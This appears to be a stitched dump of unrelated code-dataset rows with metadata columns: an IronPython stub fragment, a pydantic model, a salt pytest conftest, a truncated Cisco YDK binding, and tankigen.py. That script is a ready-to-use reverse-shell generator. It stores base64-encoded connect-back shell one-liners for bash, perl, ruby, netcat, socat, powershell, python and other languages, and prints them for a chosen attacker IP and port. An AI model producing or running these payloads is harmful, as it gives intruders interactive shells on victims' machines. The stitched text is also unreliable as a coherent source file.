"""Get: TreatAsInputRoot(self: HwndSourceParameters) -> bool
Set: TreatAsInputRoot(self: HwndSourceParameters)=value
"""
UsesPerPixelOpacity=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that declares whether the per-pixel opacity of the source window content is respected.
Get: UsesPerPixelOpacity(self: HwndSourceParameters) -> bool
Set: UsesPerPixelOpacity(self: HwndSourceParameters)=value
"""
UsesPerPixelTransparency=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: UsesPerPixelTransparency(self: HwndSourceParameters) -> bool
Set: UsesPerPixelTransparency(self: HwndSourceParameters)=value
"""
Width=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value that indicates the width of the window.
Get: Width(self: HwndSourceParameters) -> int
Set: Width(self: HwndSourceParameters)=value
"""
WindowClassStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the Microsoft Windows class style for the window.
Get: WindowClassStyle(self: HwndSourceParameters) -> int
Set: WindowClassStyle(self: HwndSourceParameters)=value
"""
WindowName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the name of the window.
Get: WindowName(self: HwndSourceParameters) -> str
Set: WindowName(self: HwndSourceParameters)=value
"""
WindowStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the style for the window.
Get: WindowStyle(self: HwndSourceParameters) -> int
Set: WindowStyle(self: HwndSourceParameters)=value
"""
| 34.628571 | 202 | 0.724697 | 856 | 7,272 | 6.123832 | 0.16472 | 0.103014 | 0.061808 | 0.082411 | 0.364365 | 0.306562 | 0.277947 | 0.277947 | 0.277947 | 0.25124 | 0 | 0.000667 | 0.17478 | 7,272 | 209 | 203 | 34.794258 | 0.872855 | 0.236799 | 0 | 0.205882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205882 | false | 0.205882 | 0 | 0 | 0.764706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8c4c36dcf3a36b91253467e951433811ad79e4f5 | 594 | py | Python | tcex/input/models/create_config_model.py | phuerta-tc/tcex | 4a4e800e1a6114c1fde663f8c3ab7a1d58045c79 | [
"Apache-2.0"
] | null | null | null | tcex/input/models/create_config_model.py | phuerta-tc/tcex | 4a4e800e1a6114c1fde663f8c3ab7a1d58045c79 | [
"Apache-2.0"
] | null | null | null | tcex/input/models/create_config_model.py | phuerta-tc/tcex | 4a4e800e1a6114c1fde663f8c3ab7a1d58045c79 | [
"Apache-2.0"
] | null | null | null | """Create Config Model"""
# pylint: disable=no-self-argument,no-self-use
# standard library
from typing import Any, Dict
# third-party
from pydantic import BaseModel, root_validator
class CreateConfigModel(BaseModel):
"""Create Config Model"""
# TODO: [low] workaround for PLAT-4393
@root_validator(pre=True)
def empty_str_to_none(cls, values: Dict[str, Any]):
"""Convert empty strings to None.
Core sends '' for field that are not populated instead of sending a null value.
"""
return {k: v if v != '' else None for k, v in values.items()}
| 28.285714 | 87 | 0.676768 | 84 | 594 | 4.72619 | 0.72619 | 0.060453 | 0.085642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008547 | 0.212121 | 594 | 20 | 88 | 29.7 | 0.839744 | 0.442761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
8c5d9469f1ba60a3fb0da919781f5dd7bbae10c6 | 11,397 | py | Python | tankigen.py | MasterScott/tankigen | 2386fea5acbb16ae14649528a5889cb8a3fef0e9 | [
"MIT"
] | 18 | 2021-03-22T08:41:47.000Z | 2022-02-23T00:32:37.000Z | tankigen.py | MasterScott/tankigen | 2386fea5acbb16ae14649528a5889cb8a3fef0e9 | [
"MIT"
] | 1 | 2021-06-04T01:45:37.000Z | 2021-06-04T01:46:01.000Z | tankigen.py | MasterScott/tankigen | 2386fea5acbb16ae14649528a5889cb8a3fef0e9 | [
"MIT"
] | 8 | 2021-03-23T20:36:53.000Z | 2021-09-21T12:30:08.000Z | #starting function
# importing the necessary packages
import time
import sys
import os
# Function for implementing the loading animation
def load_animation():
    """Animate a case-flipping 'starting tankigen' banner with a spinner, then clear the console."""
    load_str = "starting tankigen please wait..."
    ls_len = len(load_str)
    animation = "|/-\\"   # spinner frames, one shown per tick
    anicount = 0          # index of the current spinner frame
    counttime = 0         # ticks elapsed; the loop runs exactly 100
    i = 0                 # position of the character whose case flips next
    while counttime != 100:
        # Smaller sleep -> faster animation.
        time.sleep(0.075)
        chars = list(load_str)
        code = ord(chars[i])
        # Leave spaces (32) and dots (46) untouched; otherwise toggle ASCII
        # case: lowercase (code > 90) loses 32, uppercase gains 32.
        if code != 32 and code != 46:
            flipped = code - 32 if code > 90 else code + 32
            chars[i] = chr(flipped)
        res = "".join(chars)
        # \r rewinds to the line start so each frame overdraws the previous.
        sys.stdout.write("\r" + res + animation[anicount])
        sys.stdout.flush()
        load_str = res
        anicount = (anicount + 1) % 4
        i = (i + 1) % ls_len
        counttime = counttime + 1
    # Blank the screen once the animation finishes.
    if os.name == "nt":
        os.system("cls")    # Windows
    else:
        os.system("clear")  # Linux / macOS
# Driver program
# Entry point: play the start-up animation only when executed as a script.
if __name__ == '__main__':
    load_animation()
# Your desired code continues from here
import argparse
import base64
import sys
#Python program to print
#colored text and background
# Python program to print
# colored text and background
# ANSI-colour print helpers: each wraps its argument in the named foreground
# colour (\033[9Xm) and resets the attributes with \033[00m before printing.
def prRed(skk):
    print("\033[91m {}\033[00m".format(skk))
def prGreen(skk):
    print("\033[92m {}\033[00m".format(skk))
def prYellow(skk):
    print("\033[93m {}\033[00m".format(skk))
def prLightPurple(skk):
    print("\033[94m {}\033[00m".format(skk))
def prPurple(skk):
    print("\033[95m {}\033[00m".format(skk))
def prCyan(skk):
    print("\033[96m {}\033[00m".format(skk))
def prLightGray(skk):
    print("\033[97m {}\033[00m".format(skk))
def prBlack(skk):
    print("\033[98m {}\033[00m".format(skk))
prCyan ("A.K.A thelinuxuser-choice, ")
prYellow ("Subodha Prabash")
prGreen ("Coded with python")
prRed ("you can get reverse shell cheat-sheet")
prGreen ("help me there is pull requests")
banner = r'''
░░░░░░███████ ]▄▄▄▄▄▄▄▄
▂▄▅█████████▅▄▃▂
I███████████████████].
◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤...
'''
prCyan(banner)
from time import sleep
import sys
line_1 = "|This is coded by me donot copy this code without giving me credits |"
for x in line_1:
print(x, end='')
sys.stdout.flush()
sleep(0.1)
prRed("thelinuxuser-choice :")
# Two-step start-up progress bar; advances once per second.
# Requires the third-party package: alive_progress.
from alive_progress import alive_bar
import time
mylist = [1,2]
with alive_bar(len(mylist)) as bar:
    for i in mylist:
        bar()
        time.sleep(1)
# CLI definition: -i/-p select the connect-back address, -t picks one shell
# type, -l lists the available types, -a generates every type.
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip", type=str, help="IP address", dest='ipaddr')
parser.add_argument("-p", "--port", type=int, help="Port number", dest='portnum')
parser.add_argument("-t", "--type", type=str, help="Type of the reverse shell to generate", dest='type')
parser.add_argument("-l", "--list", action="store_true", help="List all available shell types", dest='list')
parser.add_argument("-a", "--all", action="store_true", help="Generate all the shells", dest='all')
# With no CLI arguments at all, fall back to ['--help'] so usage is printed.
# (Technique from https://stackoverflow.com/a/47440202.)
args = parser.parse_args(args=None if sys.argv[1:] else ['--help'])
shell_dict = {
"bash" : ['YmFzaCAtaSA+JiAvZGV2L3RjcC97MH0vezF9IDA+JjE=', 'MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC97MH0vezF9OyBzaCA8JjE5NiA+JjE5NiAyPiYxOTY='],
"perl" : ['cGVybCAtZSAndXNlIFNvY2tldDskaT0iezB9IjskcD17MX07c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe3tvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9fTsn',
'cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCJ7MH06ezF9Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3N5c3RlbSRfIHdoaWxlPD47Jw==',
'Tk9URTogV2luZG93cyBvbmx5CnBlcmwgLU1JTyAtZSAnJGM9bmV3IElPOjpTb2NrZXQ6OklORVQoUGVlckFkZHIsInswfTp7MX0iKTtTVERJTi0+ZmRvcGVuKCRjLHIpOyR+LT5mZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGU8Pjsn'],
"ruby" : ['cnVieSAtcnNvY2tldCAtZSdmPVRDUFNvY2tldC5vcGVuKCJ7MH0iLHsxfSkudG9faTtleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgPCYlZCA+JiVkIDI+JiVkIixmLGYsZikn',
'cnVieSAtcnNvY2tldCAtZSAnZXhpdCBpZiBmb3JrO2M9VENQU29ja2V0Lm5ldygiezB9IiwiezF9Iik7d2hpbGUoY21kPWMuZ2V0cyk7SU8ucG9wZW4oY21kLCJyIil7e3xpb3xjLnByaW50IGlvLnJlYWR9fWVuZCc=',
'Tk9URTogV2luZG93cyBvbmx5CnJ1YnkgLXJzb2NrZXQgLWUgJ2M9VENQU29ja2V0Lm5ldygiezB9IiwiezF9Iik7d2hpbGUoY21kPWMuZ2V0cyk7SU8ucG9wZW4oY21kLCJyIil7e3xpb3xjLnByaW50IGlvLnJlYWR9fWVuZCc='],
"golang" : ['ZWNobyAncGFja2FnZSBtYWluO2ltcG9ydCJvcy9leGVjIjtpbXBvcnQibmV0IjtmdW5jIG1haW4oKXt7YyxfOj1uZXQuRGlhbCgidGNwIiwiezB9OnsxfSIpO2NtZDo9ZXhlYy5Db21tYW5kKCIvYmluL3NoIik7Y21kLlN0ZGluPWM7Y21kLlN0ZG91dD1jO2NtZC5TdGRlcnI9YztjbWQuUnVuKCl9fScgPiAvdG1wL3QuZ28gJiYgZ28gcnVuIC90bXAvdC5nbyAmJiBybSAvdG1wL3QuZ28='],
"netcat" : ['bmMgLWUgL2Jpbi9zaCB7MH0gezF9', 'bmMgLWUgL2Jpbi9iYXNoIHswfSB7MX0=', 'bmMgLWMgYmFzaCB7MH0gezF9', 'Tk9URTogT3BlbkJTRApybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyB7MH0gezF9ID4vdG1wL2Y='],
"ncat" : ['bmNhdCB7MH0gezF9IC1lIC9iaW4vYmFzaA==', 'bmNhdCAtLXVkcCB7MH0gezF9IC1lIC9iaW4vYmFzaA=='],
"powershell" : ['cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCJ7MH0iLHsxfSk7JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpKSAtbmUgMCl7ezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiAgPSAkc2VuZGJhY2sgKyAiUFMgIiArIChwd2QpLlBhdGggKyAiPiAiOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX19OyRjbGllbnQuQ2xvc2UoKQ==',
'cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCd7MH0nLHsxfSk7JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpKSAtbmUgMCl7ezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfX07JGNsaWVudC5DbG9zZSgpIg=='],
"awk" : ['YXdrICdCRUdJTiB7e3MgPSAiL2luZXQvdGNwLzAvezB9L3sxfSI7IHdoaWxlKDQyKSB7eyBkb3t7IHByaW50ZiAic2hlbGw+IiB8JiBzOyBzIHwmIGdldGxpbmUgYzsgaWYoYyl7eyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfX0gfX0gd2hpbGUoYyAhPSAiZXhpdCIpIGNsb3NlKHMpOyB9fX19JyAvZGV2L251bGw='],
"lua" : ['Tk9URTogTGludXggb25seQpsdWEgLWUgInJlcXVpcmUoJ3NvY2tldCcpO3JlcXVpcmUoJ29zJyk7dD1zb2NrZXQudGNwKCk7dDpjb25uZWN0KCd7MH0nLCd7MX0nKTtvcy5leGVjdXRlKCcvYmluL3NoIC1pIDwmMyA+JjMgMj4mMycpOyI=',
'bHVhNS4xIC1lICdsb2NhbCBob3N0LCBwb3J0ID0gInswfSIsIHsxfSBsb2NhbCBzb2NrZXQgPSByZXF1aXJlKCJzb2NrZXQiKSBsb2NhbCB0Y3AgPSBzb2NrZXQudGNwKCkgbG9jYWwgaW8gPSByZXF1aXJlKCJpbyIpIHRjcDpjb25uZWN0KGhvc3QsIHBvcnQpOyB3aGlsZSB0cnVlIGRvIGxvY2FsIGNtZCwgc3RhdHVzLCBwYXJ0aWFsID0gdGNwOnJlY2VpdmUoKSBsb2NhbCBmID0gaW8ucG9wZW4oY21kLCAiciIpIGxvY2FsIHMgPSBmOnJlYWQoIiphIikgZjpjbG9zZSgpIHRjcDpzZW5kKHMpIGlmIHN0YXR1cyA9PSAiY2xvc2VkIiB0aGVuIGJyZWFrIGVuZCBlbmQgdGNwOmNsb3NlKCkn'],
"java" : ['ciA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpO3AgPSByLmV4ZWMoWyIvYmluL3NoIiwiLWMiLCJleGVjIDU8Pi9kZXYvdGNwL3swfS97MX07Y2F0IDwmNSB8IHdoaWxlIHJlYWQgbGluZTsgZG8gXCRsaW5lIDI+JjUgPiY1OyBkb25lIl0gYXMgU3RyaW5nW10pO3Aud2FpdEZvcigpOw=='],
"socat" : ['c29jYXQgZXhlYzonYmFzaCAtbGknLHB0eSxzdGRlcnIsc2V0c2lkLHNpZ2ludCxzYW5lIHRjcDp7MH06ezF9', 'c29jYXQgdGNwLWNvbm5lY3Q6e306e30gc3lzdGVtOi9iaW4vc2g='],
"nodejs" : ['KGZ1bmN0aW9uKCl7e3ZhciBuZXQ9cmVxdWlyZSgibmV0IiksY3A9cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLHNoPWNwLnNwYXduKCIvYmluL3NoIixbXSk7dmFyIGNsaWVudD1uZXcgbmV0LlNvY2tldCgpO2NsaWVudC5jb25uZWN0KHsxfSwiezB9IixmdW5jdGlvbigpe3tjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO319KTtyZXR1cm4gL2EvO319KSgpOw=='],
"telnet" : ['cm0gLWYgL3RtcC9wOyBta25vZCAvdG1wL3AgcCAmJiB0ZWxuZXQgezB9IHsxfSAwL3RtcC9w'],
"python" : ['cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiezB9Iix7MX0pKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOyc=', 'Tk9URTogUHl0aG9uMwpweXRob24zIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiezB9Iix7MX0pKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOyc=']
}
if args.ipaddr or args.portnum != None:
ip = args.ipaddr
port = args.portnum
else:
ip = '10.0.0.1'
port = 1234
if args.type:
prYellow('\n' + "[>]" " " + args.type + " " + "reverse shell" + " " + "[<]")
for k,v in shell_dict.items():
for i in v:
if k == args.type:
x = base64.b64decode(i).decode('utf-8')
prPurple('\n' + x.format(ip, port))
if args.list:
prRed('\n' + "[>] Available Shells [<]\n")
for k,v in shell_dict.items():
prYellow(k.capitalize())
if args.all:
from sty import fg, bg, ef, rs
prGreen('\n' + "[>] Generated All Shells [<]")
for k,v in shell_dict.items():
for i in v:
x = base64.b64decode(i).decode('utf-8')
print(bg.black + fg(201)+'\n'+ x.format(ip, port) + bg.rs +fg.rs)
#color
#highlight
from sty import fg, bg, ef, rs
bar = bg.blue + 'Thank you!' + bg.rs
print(bar)
#- Reverse Shells From -
#https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
#http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
| 47.886555 | 743 | 0.759059 | 788 | 11,397 | 11.013959 | 0.392132 | 0.006452 | 0.010139 | 0.013826 | 0.047817 | 0.030073 | 0.030073 | 0.016592 | 0.006452 | 0.006452 | 0 | 0.094195 | 0.155129 | 11,397 | 237 | 744 | 48.088608 | 0.799772 | 0.112135 | 0 | 0.146154 | 0 | 0 | 0.629935 | 0.543345 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069231 | false | 0 | 0.092308 | 0 | 0.161538 | 0.084615 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8c62aa566fbde5492bba59a6c11c2b33b87a6089 | 1,002 | py | Python | tests/integration/factories/cli/conftest.py | danielrobbins/pytest-salt-factories | 9c9dc882628f6ddb93dab88bf548755d2196cec9 | [
"Apache-2.0"
] | null | null | null | tests/integration/factories/cli/conftest.py | danielrobbins/pytest-salt-factories | 9c9dc882628f6ddb93dab88bf548755d2196cec9 | [
"Apache-2.0"
] | null | null | null | tests/integration/factories/cli/conftest.py | danielrobbins/pytest-salt-factories | 9c9dc882628f6ddb93dab88bf548755d2196cec9 | [
"Apache-2.0"
] | null | null | null | """
tests.integration.factories.cli.conftest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import pytest
@pytest.fixture(scope="package")
def master_id():
    """Identifier assigned to this package's salt-master daemon."""
    identifier = "integration-cli-master"
    return identifier
@pytest.fixture(scope="package")
def minion_id():
    """Identifier assigned to this package's salt-minion daemon."""
    identifier = "integration-cli-minion"
    return identifier
@pytest.fixture(scope="package")
def salt_master(salt_factories, master_id):
    """Configure, start and yield a salt-master; stop it on teardown."""
    daemon = salt_factories.get_salt_master_daemon(
        master_id, config_overrides={"open_mode": True}
    )
    with daemon.started():
        yield daemon
@pytest.fixture(scope="package")
def salt_minion(salt_factories, minion_id, salt_master):
    """Configure, start and yield a salt-minion; stop it on teardown.

    NOTE(review): ``salt_factories`` is not used in the body — presumably
    requested only so the fixture graph orders start-up; confirm.
    """
    daemon = salt_master.get_salt_minion_daemon(minion_id)
    with daemon.started():
        yield daemon
@pytest.fixture(scope="package")
def salt_cli(salt_master):
    """Provide the ``salt`` CLI wrapper bound to the running master."""
    cli = salt_master.get_salt_cli()
    return cli
| 23.857143 | 97 | 0.695609 | 123 | 1,002 | 5.439024 | 0.268293 | 0.104634 | 0.134529 | 0.186846 | 0.433483 | 0.349776 | 0.301943 | 0.301943 | 0.185351 | 0.185351 | 0 | 0 | 0.150699 | 1,002 | 41 | 98 | 24.439024 | 0.786134 | 0.190619 | 0 | 0.428571 | 0 | 0 | 0.113842 | 0.056921 | 0 | 0 | 0 | 0 | 0 | 1 | 0.238095 | false | 0 | 0.047619 | 0.142857 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
8c651d22173586246287ff7a070395391804c0f6 | 14,899 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_fretta_grid_svr_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_fretta_grid_svr_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_fretta_grid_svr_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """ Cisco_IOS_XR_fretta_grid_svr_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR fretta\-grid\-svr package operational data.
This module contains definitions
for the following management objects\:
grid\: GRID operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Grid(Entity):
    """
    GRID operational data

    .. attribute:: nodes

        Table of nodes

        **type**\: :py:class:`Nodes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes>`
    """

    # YANG namespace prefix and the model revision this binding tracks.
    _prefix = 'fretta-grid-svr-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Grid, self).__init__()
        self._top_entity = None

        self.yang_name = "grid"
        self.yang_parent_name = "Cisco-IOS-XR-fretta-grid-svr-oper"
        self.is_top_level_class = True
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # Maps YANG child names to (python attribute, binding class).
        self._child_classes = OrderedDict([("nodes", ("nodes", Grid.Nodes))])
        self._leafs = OrderedDict()

        self.nodes = Grid.Nodes()
        self.nodes.parent = self
        self._children_name_map["nodes"] = "nodes"
        self._segment_path = lambda: "Cisco-IOS-XR-fretta-grid-svr-oper:grid"
        # Once frozen, attribute writes are validated via _perform_setattr.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Grid, [], name, value)

    class Nodes(Entity):
        """
        Table of nodes

        .. attribute:: node

            Operational data for a particular node

            **type**\: list of :py:class:`Node <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node>`
        """

        _prefix = 'fretta-grid-svr-oper'
        _revision = '2015-11-09'

        def __init__(self):
            super(Grid.Nodes, self).__init__()

            self.yang_name = "nodes"
            self.yang_parent_name = "grid"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("node", ("node", Grid.Nodes.Node))])
            self._leafs = OrderedDict()

            # Keyed list of per-node operational data.
            self.node = YList(self)
            self._segment_path = lambda: "nodes"
            self._absolute_path = lambda: "Cisco-IOS-XR-fretta-grid-svr-oper:grid/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(Grid.Nodes, [], name, value)

        class Node(Entity):
            """
            Operational data for a particular node

            .. attribute:: node_name (key)

                Node ID

                **type**\: str

                **pattern:** ([a\-zA\-Z0\-9\_]\*\\d+/){1,2}([a\-zA\-Z0\-9\_]\*\\d+)

            .. attribute:: client_xr

                GRID Client Table

                **type**\: :py:class:`ClientXr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.ClientXr>`

            .. attribute:: clients

                GRID Client Consistency Check

                **type**\: :py:class:`Clients <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.Clients>`
            """

            _prefix = 'fretta-grid-svr-oper'
            _revision = '2015-11-09'

            def __init__(self):
                super(Grid.Nodes.Node, self).__init__()

                self.yang_name = "node"
                self.yang_parent_name = "nodes"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                # 'node_name' is the YANG list key for this entry.
                self.ylist_key_names = ['node_name']
                self._child_classes = OrderedDict([("client-xr", ("client_xr", Grid.Nodes.Node.ClientXr)), ("clients", ("clients", Grid.Nodes.Node.Clients))])
                self._leafs = OrderedDict([
                    ('node_name', (YLeaf(YType.str, 'node-name'), ['str'])),
                ])
                self.node_name = None

                self.client_xr = Grid.Nodes.Node.ClientXr()
                self.client_xr.parent = self
                self._children_name_map["client_xr"] = "client-xr"

                self.clients = Grid.Nodes.Node.Clients()
                self.clients.parent = self
                self._children_name_map["clients"] = "clients"
                # Path segment embeds the key predicate, e.g. node[node-name='0/RP0/CPU0'].
                self._segment_path = lambda: "node" + "[node-name='" + str(self.node_name) + "']"
                self._absolute_path = lambda: "Cisco-IOS-XR-fretta-grid-svr-oper:grid/nodes/%s" % self._segment_path()
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(Grid.Nodes.Node, ['node_name'], name, value)

            class ClientXr(Entity):
                """
                GRID Client Table

                .. attribute:: client

                    GRID Client Database

                    **type**\: list of :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.ClientXr.Client>`
                """

                _prefix = 'fretta-grid-svr-oper'
                _revision = '2015-11-09'

                def __init__(self):
                    super(Grid.Nodes.Node.ClientXr, self).__init__()

                    self.yang_name = "client-xr"
                    self.yang_parent_name = "node"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("client", ("client", Grid.Nodes.Node.ClientXr.Client))])
                    self._leafs = OrderedDict()

                    self.client = YList(self)
                    self._segment_path = lambda: "client-xr"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(Grid.Nodes.Node.ClientXr, [], name, value)

                class Client(Entity):
                    """
                    GRID Client Database

                    .. attribute:: client_name (key)

                        Client name

                        **type**\: str

                        **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+

                    .. attribute:: client_data

                        Client information

                        **type**\: list of :py:class:`ClientData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.ClientXr.Client.ClientData>`
                    """

                    _prefix = 'fretta-grid-svr-oper'
                    _revision = '2015-11-09'

                    def __init__(self):
